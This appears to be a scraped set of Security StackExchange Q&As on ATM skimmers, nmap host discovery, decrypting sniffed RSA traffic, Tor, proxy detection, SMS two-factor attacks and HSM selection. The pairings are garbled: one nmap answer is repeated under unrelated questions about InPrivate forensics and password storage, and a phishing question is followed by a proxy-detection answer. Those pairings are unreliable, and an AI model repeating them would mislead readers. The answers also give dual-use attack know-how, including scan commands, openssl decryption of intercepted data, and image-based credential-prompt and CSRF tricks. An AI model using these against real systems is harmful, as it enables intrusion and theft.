different ATM. source: consumerist.com Hackers are getting smarter though, and technology to enable more advanced and harder to detect skimming devices is becoming more widespread (e.g. 3D printers, tiny cameras that can record PINs through a pinhole,...). So how are we, consumers, supposed to detect all of this? ATMs themselves vary greatly bank to bank, country to country. Sometimes, even same banks will use multiple different ATMs, and anti-skimming fascias might be different altogether. Hackers might have super-glued overlaid keyboard and the skimmer, the camera can be so tiny and hidden so well it would be nigh impossible to detect, or the complete circuitry (reader, camera, the whole shebang) extremely well disguised to look nearly identical to ATMs original fascia. ATM skimmer showing slot cover and pinhole for PIN camera. Would you have noticed it? The example in the photograph above could be scarier, if it was in matching colour and texture to the ATM's own plastic fascia, and maybe cut a bit nicer too. Noting too hard to do really. But even as it is, it's still disguised well enough to fool any slightly too casual customer in daylight, and possibly even the most cautious ones during night and under artificial illumination. Notice how tiny the camera pinhole is. Put a smudge of dirt around the pinhole, and it would be unnoticeable. So with all this in mind, my question is: How can we detect, in reasonable time and assuming the attackers got in the meantime smarter and better equipped than what we learned so far, if ATM was tampered with and any skimming devices (or other traps) installed onto it? I've left the question intentionally slightly open to interpretation and am interested in both latest & greatest ATM anti-fraud technology used by banks, as well as any good suggestions on how an average ATM user could detect such fraud schemes and devices, if present. | From an end user perspective, i usually give the reader and surrounding plates a good whack with my fist and i try and peel back any of the faceplates with my keys or a knife. The fact of the matter is, the best quality skimmers aren't detectable. POS machines can be hacked which results in an almost undetectable scenario. Your best bet, if you want to avoid being skimmed, is to cash out at a teller at the bank :) From a company perspective, I've come across two new defenses against skimmers recently from perusing ATM manuals (I'm doing some work with them at the moment and have all the manuals/specifications) 1) Sensors to detect any obstruction in front of the the card-reader for extended periods of time it'll trigger an alert. These sensors are light sensors, proximity sensors and beam sensors depending on the ATM in question. These are both mounted inside the card reader and around the device in general. 2) Sensors to detect constant RF signals. If you transmit for more than xx seconds (i won't mention the exact time frame) it'll trigger an alert. From the manual: Radio frequency (RF) detection is used for detection of analogue
transmitting spy cameras fitted to the ATM for purposes of
fraudulently capturing card holder PIN entry. RF detection does not
trigger an alert but provides additional supporting information to an
alert if a fraud device is detected by a sensor at the same time as an
RF detect alert. Additionally: HSFD consists of the following elements: Control board RF detect sensor (optional) From one to six sensors Cellular modem(to transmit alerts), with separate antenna (optional). The following diagram shows an overview of the High Security Fraud Detection (HSFD) feature. Dashed lines indicate optional components: Alerts usually go to a back to base central monitoring solution somewhere controlled by the bank that owns the ATM There's a new proof of concept Anti-Skimming technology called SRS “Secure revolving system” that got announced recently, there's a video of in in action here . Original story here The actual SRS device looks like this: Basically it accepts the card 'side on' (as opposed to the usual card entry method) and then rotates it 90 degrees before accepting it. This basically prevents any face plate being attached over the device and makes it very difficult to position a skimmer. | {
"source": [
"https://security.stackexchange.com/questions/36135",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20074/"
]
} |
36,198 | I am trying to find the live hosts on my network using nmap. I am scanning the network in Ubuntu using the command sudo nmap -sP 192.168.2.1/24 . However, I am unable to find the live hosts. I just get the network address of my own PC as live. When I see the DHCP client list through my browser (my router can be accessed via browser using my network IP), I get around 10 live hosts on the network. Can anyone tell me the reason why this could be happening and how do I find the live hosts on my network? | This is the simplest way of performing host discovery with nmap. nmap -sP 192.168.2.1/24 Why does it not work all the time ? When this command runs nmap tries to ping the given IP address range to check if the hosts are alive. If ping fails it tries to send syn packets to port 80 (SYN scan). This is not hundred percent reliable because modern host based firewalls block ping and port 80. Windows firewall blocks ping by default. The hosts you have on the network are blocking ping and the port 80 is not accepting connections. Hence nmap assumes that the host is not up. So is there a workaround to this problem? Yes. One of the options that you have is using the -P0 flag which skips the host discovery process and tries to perform a port scan on all the IP addresses (In this case even vacant IP addresses will be scanned). Obviously this will take a large amount of time to complete the scan even if you are in a small (20-50 hosts) network. but it will give you the results. The better option would be to specify custom ports for scanning. Nmap allows you to probe specific ports with SYN/UDP packets. It is generally recommended to probe commonly used ports e.g. TCP-22 (ssh) or TCP-3389 (windows remote desktop) or UDP-161 (SNMP). sudo nmap -sP -PS22,3389 192.168.2.1/24 #custom TCP SYN scan
sudo nmap -sP -PU161 192.168.2.1/24 #custom UDP scan N.B. even after specifying custom ports for scanning you may not get an active host. A lot depends on how the host is configured and which services it is using. So you just have keep probing with different combinations.Remember, do not performs scans on a network without proper authorization. update : When scanning a network you can never be sure that a particular command will give you all the desired results. The approach should be to start with basic ping sweep and if it doesn't work try guessing the applications that may be running on the hosts and probe the corresponding ports. The idea of using Wireshark is also interesting. You may want to try sending ACK packets. nmap -sP -PA21,22,25,3389 192.168.2.1/24 #21 is used by ftp update two: The flags -sP and -P0 are now known as -sn and -Pn respectively. However the older flags are still found to be working in the newer versions. | {
"source": [
"https://security.stackexchange.com/questions/36198",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18637/"
]
} |
36,208 | I heard that it is possible to use EnCase to recover IE InPrivate browsing history. Is this really possible? If so, suppose that a computer has been shut down right after usage of InPrivate browsing in IE (e.g. there are tabs opened, and users just shut down the whole computer without shutting down windows.) How much would history be likely recovered? | This is the simplest way of performing host discovery with nmap. nmap -sP 192.168.2.1/24 Why does it not work all the time ? When this command runs nmap tries to ping the given IP address range to check if the hosts are alive. If ping fails it tries to send syn packets to port 80 (SYN scan). This is not hundred percent reliable because modern host based firewalls block ping and port 80. Windows firewall blocks ping by default. The hosts you have on the network are blocking ping and the port 80 is not accepting connections. Hence nmap assumes that the host is not up. So is there a workaround to this problem? Yes. One of the options that you have is using the -P0 flag which skips the host discovery process and tries to perform a port scan on all the IP addresses (In this case even vacant IP addresses will be scanned). Obviously this will take a large amount of time to complete the scan even if you are in a small (20-50 hosts) network. but it will give you the results. The better option would be to specify custom ports for scanning. Nmap allows you to probe specific ports with SYN/UDP packets. It is generally recommended to probe commonly used ports e.g. TCP-22 (ssh) or TCP-3389 (windows remote desktop) or UDP-161 (SNMP). sudo nmap -sP -PS22,3389 192.168.2.1/24 #custom TCP SYN scan
sudo nmap -sP -PU161 192.168.2.1/24 #custom UDP scan N.B. even after specifying custom ports for scanning you may not get an active host. A lot depends on how the host is configured and which services it is using. So you just have keep probing with different combinations.Remember, do not performs scans on a network without proper authorization. update : When scanning a network you can never be sure that a particular command will give you all the desired results. The approach should be to start with basic ping sweep and if it doesn't work try guessing the applications that may be running on the hosts and probe the corresponding ports. The idea of using Wireshark is also interesting. You may want to try sending ACK packets. nmap -sP -PA21,22,25,3389 192.168.2.1/24 #21 is used by ftp update two: The flags -sP and -P0 are now known as -sn and -Pn respectively. However the older flags are still found to be working in the newer versions. | {
"source": [
"https://security.stackexchange.com/questions/36208",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26198/"
]
} |
36,223 | I've found many posts on StackOverflow and other sites using Google, but since security is always changing, and what was safe a few months ago not me anymore... I felt the need to ask on here. Unfortunately my server does not support Blowfish. I am looking for the most simple way possible to store passwords safely. | This is the simplest way of performing host discovery with nmap. nmap -sP 192.168.2.1/24 Why does it not work all the time ? When this command runs nmap tries to ping the given IP address range to check if the hosts are alive. If ping fails it tries to send syn packets to port 80 (SYN scan). This is not hundred percent reliable because modern host based firewalls block ping and port 80. Windows firewall blocks ping by default. The hosts you have on the network are blocking ping and the port 80 is not accepting connections. Hence nmap assumes that the host is not up. So is there a workaround to this problem? Yes. One of the options that you have is using the -P0 flag which skips the host discovery process and tries to perform a port scan on all the IP addresses (In this case even vacant IP addresses will be scanned). Obviously this will take a large amount of time to complete the scan even if you are in a small (20-50 hosts) network. but it will give you the results. The better option would be to specify custom ports for scanning. Nmap allows you to probe specific ports with SYN/UDP packets. It is generally recommended to probe commonly used ports e.g. TCP-22 (ssh) or TCP-3389 (windows remote desktop) or UDP-161 (SNMP). sudo nmap -sP -PS22,3389 192.168.2.1/24 #custom TCP SYN scan
sudo nmap -sP -PU161 192.168.2.1/24 #custom UDP scan N.B. even after specifying custom ports for scanning you may not get an active host. A lot depends on how the host is configured and which services it is using. So you just have keep probing with different combinations.Remember, do not performs scans on a network without proper authorization. update : When scanning a network you can never be sure that a particular command will give you all the desired results. The approach should be to start with basic ping sweep and if it doesn't work try guessing the applications that may be running on the hosts and probe the corresponding ports. The idea of using Wireshark is also interesting. You may want to try sending ACK packets. nmap -sP -PA21,22,25,3389 192.168.2.1/24 #21 is used by ftp update two: The flags -sP and -P0 are now known as -sn and -Pn respectively. However the older flags are still found to be working in the newer versions. | {
"source": [
"https://security.stackexchange.com/questions/36223",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26214/"
]
} |
36,316 | I wanted to install the Linkedin app on my Android phone and I was shocked when it asked for nearly all possible permissions including reading all of my private data and calendar data . Why does any application like Linkedin which is probably implemented as a simple webview possibly need access to such sensible data? Can I consider this as spyware? | @Stolas has already explained that the only way to be sure what an application does is to reverse engineer it and inspect its code, and @RoryAlsop already described why such access permissions are required from the application architectural point of view. But there's one thing that I feel I should add. I think there's not much to worry about here. Why? LinkedIn is a fairly big player and as such under constant scrutiny of the public eye, like all the big ones are. If they were up to no good and trying to access data you didn't agree to in their TOS, and/or otherwise misuse them, they would have to deal with big problems keeping that under the rug and risk huge loss in their reputation and credibility, possibly even be a subject to legal prosecution and financial loss that would come with it, if it were ever to become public knowledge. You see, these apps aren't developed by a few tightly controlled developers kept in some basement and only allowed access to daylight once thoroughly brainwashed for any residual disclosing information. I'm being slightly sarcastic here, but I believe that living under constant paranoia is even more damaging to one's mental health than my opinion compressed in a few lines could ever be. Anyway, if LinkedIn (and this goes for any other big player in the field of social networking out there) was misusing your personal information in a way that is not clearly described in end user agreement (or other such documentation) you agreed to upon signing up for their services, and/or installing their software, chances are extremely big you'd be reading about that in the news and LinkedIn wouldn't exist anymore; One of the developers would suffer guilty consciousness and blow a whistle on them to relieve the pressure and hopefully sleep better. Or, an independent researcher would find interesting inner workings of the code he/she just reverse-engineered from a signed install package LinkedIn is publishing. Or, a sleepless networking expert (not to be confused with script kiddies ) would find some such indicative network packets being exchanged between his test client that he setup and a LinkedIn server, that the downloaded app was responsible for. Or, an IT security professional will be asked to assess potential threats some company faces with their BYOD policy. Vulnerability assessment will include some of the most common Android device software, and the mentioned LinkedIn Android app will be most likely among the first ones tests will be conducted on. Regardless who would be the first to discover it, LinkedIn could either be blackmailed and settle it privately (which could still leak eventually), or have to defend themselves in front of the eyes of the public. Both of which would incur cost to the corporation, something they don't appreciate, not in the least bit. And since alternatives to illegally exploiting your personal data are a lot cheaper, that's what they do. They test their code thoroughly for compliance with all kinds of regulations, sign them with certificates that prevent install package tampering, and they're proud to display that to end users too. The rest is then between you (your free will to disclose your personal information to whomever you want), and LinkedIn (the ones that will gladly take it and turn it into profit). This said, it's up to you to decide, how intrusive you'd find such social networking symbiosis , and if you should call it spyware . | {
"source": [
"https://security.stackexchange.com/questions/36316",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11498/"
]
} |
36,358 | I am sniffing a client side application traffic and I found some encrypted data. I am not able to decrypt it. Information which I have is Public Key: MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHfIm5pYrEMUuJUevmED6bUFx8p9G/5vF+ia+Qnrn8OeMpIJ/KS2nqDLxXx/ezNKlFArWK1Wer4diwQJ2cdiCqNorubAgnOXMV+/FsiATQjMT2E2lI9xUWqqNq+PfgyCPILRliNHT/j2qOvAOHmf3a1dP8lcpvw3x3FBBKpqtzqJAgMBAAE= Private Key: MIICWAIBAAKBgHfIm5pYrEMUuJUevmED6bUFx8p9G/5vF+ia+Qnrn8OeMpIJ/KS2nqDLxXx/ezNKlFArWK1Wer4diwQJ2cdiCqNorubAgnOXMV+/FsiATQjMT2E2lI9xUWqqNq+PfgyCPILRliNHT/j2qOvAOHmf3a1dP8lcpvw3x3FBBKpqtzqJAgMBAAECgYAJ1ykxXOeJ+0HOvl/ViITCol7ve6e5F1dXfKPI9NqDL5Pn+3oN7hLKEvN+btqoNBBLJcR7OQeMZtDs3AJQJvXIqN4UJUBf6fUshhdf9Y5MSpSqAjlqLjted2uw8xuL8gDmOYWV0yjeivvb4Qf7Vl7jAJSBwnlVsGCKmmBXDn+EoQJA63MnjKX1kWVb44HmXX+IDmgTQE6Ezpqzxbjf7ySdxYLb4yfZR+i5oEE+xtqEO5xR4vkEV5s1MuXjNdJHTkc2XwJAgj0HsrIGFw2DgyWF2Rc1w5BbtXH0+GrLTP6+kOuLw1eAZbDjQghzRGmhtdrl38ZtYZMdsrxE2HXDihsdjj2oFwJAl6470FQp+1z88XgB3EIIeJ97p3XuANuQ7NPJD9ra+R7wYUqOo9C9pQvjUV/8yBpQdpRNw9JtVzjaQxYQcdFWqQJAALclG64uqmHAny/NlGu0N+bLGiwOFG9BvqKHmXQxyFjqs6RNG0fAmleaM82IBbqpTyfnudue5TGAaXnMp8Ne8QJAKx/zf5AKPTkqZ7hBQ3IYfx7EbS2f6lelf8BNC+A/iz4dxLgx7AupPtoaKZC0Z6FWpm2s0HNvYhleU3FcAfKRig== Encrypted string: MpTF1+cqa23PdxQ6EoG9E77jfRJGYjORc4omawTg/g8jtUDZNNEeEr3waadTSLjQAfmJO94fpaA145yanoU9khrzCd/nAGIIAVwMC67UnsX+XY6dOEZMo41Z0dU1n42rUtkdXgldHXR1SQXaeDyjRnMj/mMMreNdykl8b4vNVPk= I am able to retrieve all the keys, But I am not able to view encrypted content. Help me to decrypt with procedures. | Start with saving the three parts respectively to pub.b64 , priv.b64 and blob.b64 : $ base64 -d < pub.b64 | openssl asn1parse -inform DER -i
0:d=0 hl=3 l= 158 cons: SEQUENCE
3:d=1 hl=2 l= 13 cons: SEQUENCE
5:d=2 hl=2 l= 9 prim: OBJECT :rsaEncryption
16:d=2 hl=2 l= 0 prim: NULL
18:d=1 hl=3 l= 140 prim: BIT STRING Clearly not an X.509v3 certificate. No matter, we don't need that to decrypt. openssl dumpasn1 isn't up to the heavy lifting here, try Peter Gutmann's dumpasn1 to peek inside the bit string: $ base64 -d < pub.b64 > pub.der
$ dumpasn1 -al pub.der
0 158: SEQUENCE {
3 13: SEQUENCE {
5 9: OBJECT IDENTIFIER rsaEncryption (1 2 840 113549 1 1 1)
: (PKCS #1)
16 0: NULL
: }
18 140: BIT STRING, encapsulates {
22 136: SEQUENCE {
25 128: INTEGER
: 77 C8 9B 9A 58 AC 43 14 B8 95 1E BE 61 03 E9 B5
: 05 C7 CA 7D 1B FE 6F 17 E8 9A F9 09 EB 9F C3 9E
: 32 92 09 FC A4 B6 9E A0 CB C5 7C 7F 7B 33 4A 94
: 50 2B 58 AD 56 7A BE 1D 8B 04 09 D9 C7 62 0A A3
: 68 AE E6 C0 82 73 97 31 5F BF 16 C8 80 4D 08 CC
: 4F 61 36 94 8F 71 51 6A AA 36 AF 8F 7E 0C 82 3C
: 82 D1 96 23 47 4F F8 F6 A8 EB C0 38 79 9F DD AD
: 5D 3F C9 5C A6 FC 37 C7 71 41 04 AA 6A B7 3A 89
156 3: INTEGER 65537
: }
: }
: } That's more like it, we have what appears to be a 1024-bit modulus, and a likely public exponent of 65537. The key is a base64 encoded normal RSA key in DER (binary) format: $ base64 -d priv.b64 | openssl rsa -inform DER > out.key
writing RSA key
$ cat out.key
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgHfIm5pYrEMUuJUevmED6bUFx8p9G/5vF+ia+Qnrn8OeMpIJ/KS2
nqDLxXx/ezNKlFArWK1Wer4diwQJ2cdiCqNorubAgnOXMV+/FsiATQjMT2E2lI9x
UWqqNq+PfgyCPILRliNHT/j2qOvAOHmf3a1dP8lcpvw3x3FBBKpqtzqJAgMBAAEC
gYAJ1ykxXOeJ+0HOvl/ViITCol7ve6e5F1dXfKPI9NqDL5Pn+3oN7hLKEvN+btqo
NBBLJcR7OQeMZtDs3AJQJvXIqN4UJUBf6fUshhdf9Y5MSpSqAjlqLjted2uw8xuL
8gDmOYWV0yjeivvb4Qf7Vl7jAJSBwnlVsGCKmmBXDn+EoQJBAOtzJ4yl9ZFlW+OB
5l1/iA5oE0BOhM6as8W43+8kncWC2+Mn2UfouaBBPsbahDucUeL5BFebNTLl4zXS
R05HNl8CQQCCPQeysgYXDYODJYXZFzXDkFu1cfT4astM/r6Q64vDV4BlsONCCHNE
aaG12uXfxm1hkx2yvETYdcOKGx2OPagXAkEAl6470FQp+1z88XgB3EIIeJ97p3Xu
ANuQ7NPJD9ra+R7wYUqOo9C9pQvjUV/8yBpQdpRNw9JtVzjaQxYQcdFWqQJAALcl
G64uqmHAny/NlGu0N+bLGiwOFG9BvqKHmXQxyFjqs6RNG0fAmleaM82IBbqpTyfn
udue5TGAaXnMp8Ne8QJAKx/zf5AKPTkqZ7hBQ3IYfx7EbS2f6lelf8BNC+A/iz4d
xLgx7AupPtoaKZC0Z6FWpm2s0HNvYhleU3FcAfKRig==
-----END RSA PRIVATE KEY----- If you decode that key: $ openssl asn1parse < out.key
0:d=0 hl=4 l= 600 cons: SEQUENCE
4:d=1 hl=2 l= 1 prim: INTEGER :00
7:d=1 hl=3 l= 128 prim: INTEGER
:77C89B9A58AC4314B8951EBE6103E9B505C7CA7D1BFE6F17E89AF9
09EB9FC39E329209FCA4B69EA0CBC57C7F7B334A94502B58AD567A
BE1D8B0409D9C7620AA368AEE6C0827397315FBF16C8804D08CC4F
6136948F71516AAA36AF8F7E0C823C82D19623474FF8F6A8EBC038
799FDDAD5D3FC95CA6FC37C7714104AA6AB73A89
138:d=1 hl=2 l= 3 prim: INTEGER :010001
[...snip...] and compare with the dumpasn1 decoding of the public key, you can see that they share a 1024 bit modulus and exponent, so it looks like the public and private key match. Good. So, decode your encrypted data: $ base64 -d blob.b64 > blob and decrypt it: $ openssl rsautl -decrypt -inkey out.key < blob > decrypted
$ hexdump decrypted
0000000 0355 1739 575b 5434 ccc5 bec7 e70a 0d44
0000010 a4a9 11d4 166c 3423 4e36 e657 2fea ef53 That's 32 bytes (256 bits), quite likely a key used in a symmetric cipher to encrypt more data, since you can only encrypt relatively small amounts of data with RSA Good luck with the next part ;-) | {
"source": [
"https://security.stackexchange.com/questions/36358",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19800/"
]
} |
36,420 | I just wonder how some website like WhatIsMyIP find out what your real IP address is, even if you use proxy server. It said : Proxy Detected and then they give your real IP address. Is it possible they use JavaScript to send HTTP request for not using web browser proxy settings(How could it be implemented by Java) or there is some magic technique? | There are several ways: Proxy headers, such as X-Forwarded-For and X-Client-IP , can be added by non-transparent proxies. Active proxy checking can be used - the target server attempts to connect to the client IP on common proxy ports (e.g. 8080) and flags it as a proxy if it finds such a service running. Servers can check if the request is coming from an IP that is a known proxy. WhatsMyIP probably has a big list of these, including common ones like HideMyAss. Web client software (e.g. Java applets or Flash apps) might be able to read browser settings, or directly connect to a web service on the target system (bypassing the proxy) to verify that the IPs match. Mobile app software can identify the client IP. Example: PhoneGap plugin | {
"source": [
"https://security.stackexchange.com/questions/36420",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
36,437 | I am trying to create a phishing email for a project I am on. In the email I want to link to a site that will collect IP, browser, date/time of when visited. nothing malicious but to just prove that users clicked the link.
Can I do this in social engineering toolkit or is it not possible? | There are several ways: Proxy headers, such as X-Forwarded-For and X-Client-IP , can be added by non-transparent proxies. Active proxy checking can be used - the target server attempts to connect to the client IP on common proxy ports (e.g. 8080) and flags it as a proxy if it finds such a service running. Servers can check if the request is coming from an IP that is a known proxy. WhatsMyIP probably has a big list of these, including common ones like HideMyAss. Web client software (e.g. Java applets or Flash apps) might be able to read browser settings, or directly connect to a web service on the target system (bypassing the proxy) to verify that the IPs match. Mobile app software can identify the client IP. Example: PhoneGap plugin | {
"source": [
"https://security.stackexchange.com/questions/36437",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/13718/"
]
} |
36,447 | Is it safe to display images from arbitrary domains? I.e. let's say I have an image on my page: <img src="http://badguy.com/image.gif" /> What if image.gif will return some js attack vector, but not the image? Is there any known vectors? I've tried to serve javascript:alert(1) or the same, but base64 encoded. But without any luck. Any ideas? | There used to be a "vulnerability" where the image could send a HTTP 401 Unauthenticated response, which would trigger a login screen for the user. If you set this as forum avatar, it would spawn a login popup for anyone visiting a page where your avatar appears. Lots of people will then attempt to log in with some username and password combination, probably the one for their forum account. A friend of mine found this a few years ago, but nowadays it doesn't seem to work anymore. At least I couldn't easily reproduce it a few months back. Edit: I was wrong, this attack is still possible! /edit As for XSS attacks this way, you're safe. The browser will, or should, always interpret this as an image no matter what it contains or what headers it sends. You can customize the image based on the request (serving a small image to the forum software prechecking the image so that it doesn't downscale it, then large for everyone else). Or feed the browser lots of gif-data until memory runs out or something. But there are no real big vulnerabilities here that allow Remote Code Execution as far as I know. What you are only moderately safe for are CSRF-attacks. The image can issue a HTTP 302 Moved Temporarily response and link to a new location. For example it could link to, I don't remember the specific URL, something like https://accounts.google.com/logout and log you out of google (this worked a few months ago). Or, slightly more maliciously: http://example.com/guestbook.php?action=post&message=spam-url.example.com . Only GET requests can be done this way as far as I know. Or if the image was originally being loaded as POST request, I suppose it could also redirect the POST, but not change the POST-data. So that's pretty safe. Last but not least, if the attacker controls URLs of for example forum avatars (such as in SMF forums), it's possible to obtain information from visitors such as their IP address. I wrote a tool a while ago that used the action=who page of SMF to link IP addresses to usernames. When I started displaying that to users (show "Hello $username with IP: $IP" in the image) all hell broke loose. "How could you possibly know that?!" They were mostly early- to mid-teen techies so they knew what an IP address was, but didn't know that I couldn't hack them with it. It is however considered to be personally identifiable information, at least in the Netherlands, so the admins weren't quite happy about this practice. If you don't display it though, nobody will ever know. Note: If this post seems hastily written, it is. I'm barely awake too. Perhaps I'll clean it up tomorrow if it's too much storytelling and not naming enough concrete facts and vulnerabilities. Hope this helped anyway! | {
"source": [
"https://security.stackexchange.com/questions/36447",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6869/"
]
} |
36,571 | Me -> Node A -> Node B -> Node C -> destination The documentation on Tor always states that only the exit node C can see plain text data. How is this possible without me talking to Node C directly? If I have some plain text data, and want to send it encrypted to Node A, I'd usually do a Diffie-Hellman key exchange, and send the data over. But with that scheme, Node A could decrypt the data. If Node C was somehow sharing its public key with me, couldn't Node B or Node A MITM the key? How exactly does Tor manage its PKI? What keys are used to encrypt data where? | Tor uses a routing method called Onion routing . Much like an onion, each message (the core of the onion) is covered with layers of encryption. image attribution Your message is encrypted several times before it leaves your device. Node A can only decrypt (peel) the layer A, under which it would see the address of the next node. After the packet reaches the next node, it can only decrypt (peel) layer B, and so on. For each layer, you use the respective node's public key, so only that exact node can decrypt the layer with its own private key. When the message reaches the exit node, all of the layers have been decrypted and message is now in plaintext (it could also be encrypted if you're communicating with the server under SSL). | {
"source": [
"https://security.stackexchange.com/questions/36571",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2881/"
]
} |
36,609 | When I attempt to log in to my bank, an SMS code is sent to my phone. I then type this nine-character code into the bank's Web site, to login to my account. Is this vulnerable to attack, without hacking the bank's software or server, or without access to my telephone/SMS communications? How could it be exploited? So far, the only way I can imagine would be for someone to install an app on my phone which intercepts SMS traffic, and resends the code to an attacker. How could I prevent this from happening to me? | You are right in that one of the ways an attacker could intercept the code is to hack your phone. An attacker could also: Clone your phone's sim, and request a banking code to be sent to your phone's number. they could also possibly clone a non-sim phone as well Steal your phone. Once they have your phone they could perform transactions Perform a man in the middle attack when you use your banking site. This has been done already, an attacker uses malware installed on your computer (a man in the browser attack) to direct your banking traffic to a site set up to mimic your bank's page. Or an attacker may subvert a system to act as a proxy. Either way When you type in the code the attacker gets it, then uses the code to perform a transaction Social engineer your bank to change your mobile phone details to a phone they control. If an attacker knows enough about you, and your bank's procedures aren't tight enough, then the attacker could call your bank pretending to be you and get them to change the mobile number So what can you do? Keep control of your mobile phone. Make sure your computer is kept up to date with patches and anti-malware software Do all your banking on a virtual machine, and never save its state. If your virtual machine gets hacked and you save the state then the malware will remain in the virtual machine, however if you never save its state the malware won't be able to remain on the virtual machine Many banks use some sort of authentication code to verify the identity of people calling. Write these down but do not put them onto your computer or phone, that way there's still something an attacker does not know, even if they have full access to your computer and your online identity. It's not all doom and gloom, most of the time banks can reverse transactions if caught quickly, if you suspect that a fraudulent transaction has taken place get onto your bank ASAP and get their investigators on it. How well this may go depends on what the local laws are and how good your bank is. | {
"source": [
"https://security.stackexchange.com/questions/36609",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
36,664 | A very sensitive application has to protect several different forms of data, such as passwords, credit cards, and secret documents - and encryption keys, of course. As an alternative to developing a custom solution around (standard) encryption and key management processes, the purchase of an HSM ( Hardware security module ) is under consideration. Obviously this would depend (at least in part) on the specific application, company, data types, technologies, and budget - but I would like to keep this generic, so I am leaving it at a high-level view, and ignoring a specific workflow. Let's just assume there is secret data that needs to be encrypted, and we are looking to hardware-based solutions to manage the complexity and probable insecurity of bespoke key management, and mitigate the obvious threats against software-based encryption and keys. What are the factors and criteria that should be considered, when comparing and selecting an HSM? And what are the considerations for each? For example: Obviously cost is a factor, but are there different pricing models? What should be taken into account? Are some products more suited to different forms of encryption (e.g. symmetric vs asymmetric, block vs stream, etc)? Same for different workflows and lifecycles What level of assurance, e.g. what level of FIPS 140-2, is required when? Network-attached vs server-attached etc TO BE CLEAR : I am NOT looking for product recommendations here, rather just for how to evaluate any specific product. Feel free to name products in comments, or better yet in the chatroom ... | Some technical factors that may be relevant: Performance - across whatever matters for your application (if any): encryption/decryption/key generation/signing, symmetric, asymmetric, EC, ... Scale: Is there a limit to the number of keys it supports, and could that limit be a problem? How easy is it to add another HSM when your application becomes more demanding (size, speed, geographic distribution...) Redundancy - when one HSM breaks, how much of an impact is it on your operations, how easy is it to replace without loss of service, etc Backups - how easy is it to automate and restore? Do you need to independently protect the backup's confidentiality and/or integrity or does the product ensure that? How likely are you to end up in a position where you've irrecoverably lost your data (how many factors need to be lost / forgotten, HSMs died, etc). API support: MS CAPI/ CNG (easy to program from a Windows environment); JCA (easy to develop for using Java. What version is supported?); PKCS#11 (and a recent version? Wide support across applications, though it comes with known security issues ); vendor proprietary (probably the most flexible/powerful/secure-if-you-know-what-you're-doing but increases cost to move to another vendor), and whilst C is probably a given, does it have bindings for your preferred language? a related note: is there guidance on integration with your application (e.g. DBMS, OS services)? OS / hardware support Management options - what GUI / command line tools are there for doing management tasks - i.e. anything that you do infrequently enough to not want to automate (key generation?; authentication factor management?). Do your admins need to be physically present to commission the device or perform additional tasks after commissioning? Programmability - most of your development will likely be on the other end of one of the APIs, but sometimes it is useful to be able to write applications that run on the device for greater flexibility or speed (see Thomas' answer ) Physical security - how resistant to direct physical attack does your solution need to be (bearing in mind not just the HSM but the whole solution)? If for whatever reason you decide it is particularly important (your HSM is exposed but your clients aren't, or disclosure of the keys is far worse than merely being able to use the keys for nefarious purposes - ref DigiNotar ?) then you might want to look for active tamper detection and response, not just passive tamper resistance and evidence. Logical security model - can malicious entities on the network abuse your HSM? Malicious processes on the host PC? Algorithms - does the HSM support the crypto you want to use (primitives, modes of operation and parameters e.g. curves, key sizes)? Authentication options - passwords; quorums; n-factors; smartcards; OTP; ... You should probably at least be looking for something that can require a configurable quorum size of token+password authenticated users before allowing operations using a key. Policy options - you might want to be able to define policies such as controlling whether: keys can be exported from the HSM (wrapped or unencrypted); a key can only be used for signing/encryption/decryption/...; authentication is required for signing but not verifying; etc. Audit capability - including both HSM-like operations (generated key, signed something with key Y) and handling crashes (ref g3k's comment). How easy is it going to be to integrate the logs into something like Splunk (sane log format, syslog/snmp/other network accessible - or at least non-proprietary - output)? Form factor: network attached (for larger scale deployments, particularly where multiple applications/servers/clients need to make use of the keys); desktop (for individual use; performance, availability and scalability not a big concern but cost is, especially good if your solution requires lots of people needing direct access to an HSM); PCI (-express) (cheaper than network attached; more effort involved in making available to multiple applications); USB token (easy server upgrade; cheap and slow (and easy to steal!)); PC card (as per desktop, but good for laptop users). (PC cards are pretty dead now) Some non-technical factors: Certifications - do you need any / do you want any because they give you confidence in the product's security? Ignoring what you need for regulatory reasons: FIPS 140-2 provides useful confirmation that the NIST-approved algorithms work and have run-time known answer tests (check the Security Policy to see what algs they've got approved), but don't put much stock in it otherwise showing the product is secure; my rule of thumb for Level 3 hardware security means people with only a couple of minutes access to the device will be hard pressed to compromise it. FIPS 140-2 Level 3 is the de-facto baseline certification for HSMs - be wary if it doesn't have one (though that's not to say you need to use it in a FIPS compliant way). Common Criteria evaluations are flexible in the assurance they provide: read the Security Target! There are no decent HSM Protection Profiles yet, so at the least you're going to have to read the Security Problem Definition (threats and assumptions) before you have an idea what the evaluation is providing. PCI-HSM will be useful if you're in the relevant industry Aside from certifications, how does the vendor look like at security? Having CC EAL4 certs is a good starting point, but remember Win2k has those too... Do they make convincing noises about supply chain integrity, Secure Software Development Lifecycle, ISO2700x, or something like The Open Group's Trusted Technology Provider Framework ? Do you like the vendor's policy on disclosure? Support (options, reputation, available in your language) Services - if you have a complex requirement, it might be advantageous to have the vendor involved in your configuration/programming. Documentation: High level documentation - HSMs are complex general purpose products that can require somewhat involved management; good documentation is important to allow you to develop a secure and workable process around them (see Thomas' answer for more discussion). API documentation - good coverage, preferably including good examples of common (and complex) tasks Cost (units + maintenance) Lead time Vendor patch policy / frequency (+support for and ease of firmware upgrade) Country of design and/or manufacture - you might be a Government or company that particularly (dis)trusts certain countries Vendor stability - are they likely to be around to support the product for as long as you're going to be using it? What is the vendor's product roadmap, does it hold anything of value for you, and will you have access to the future versions via firmware upgrade? How good the swag was that you got off of them at RSA There are probably many more. The SANS institute have a good introductory paper describing why you might want an HSM, the positive attributes it (should) have and some of the downsides. It seems an HSM vendor agrees with most of this list, and produced their own (unattributed) version of it . | {
"source": [
"https://security.stackexchange.com/questions/36664",
"https://security.stackexchange.com",
